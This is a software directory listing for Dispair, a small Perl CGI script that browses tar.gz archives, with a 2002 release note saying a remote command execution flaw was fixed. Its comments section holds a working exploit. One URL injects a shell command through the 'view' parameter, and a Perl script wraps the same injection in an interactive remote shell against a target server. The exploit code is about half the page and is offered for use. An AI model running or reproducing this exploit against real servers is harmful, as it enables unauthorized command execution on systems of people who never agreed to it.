Dispair
Dispair (DISPlay Archives In Realtime) is a tiny CGI-script written in Perl that lets users browse tar.gz archives.
| Tags | Internet Web Dynamic Content CGI Tools/Libraries |
|---|---|
| Licenses | BSD Original |
| Operating Systems | POSIX |
| Implementation | Perl |
Recent releases
- 31 Jul 2002 19:29
Changes: A remote command execution exploit was fixed.
- All comments
Recent commentsremote command execution exploit
http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id
Here is a perl script that provides a shell-like interface:
#!/usr/bin/perl
use strict;
use IO::Socket;
my $target = shift || die "usage: $0 <targetserver>";
my $cmd = '';
while ($cmd ne 'exit') {
print ">> "; $cmd = <STDIN>; chomp $cmd;
$cmd =~ s/ /%20/g;
my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
print $socket "Host: $target\n";
print $socket "USER-AGENT: scriptkiddie\n\n";
while (<$socket>) { last if ($_ =~ m/^\r/); }
while (<$socket>) { print; }
close $socket;
}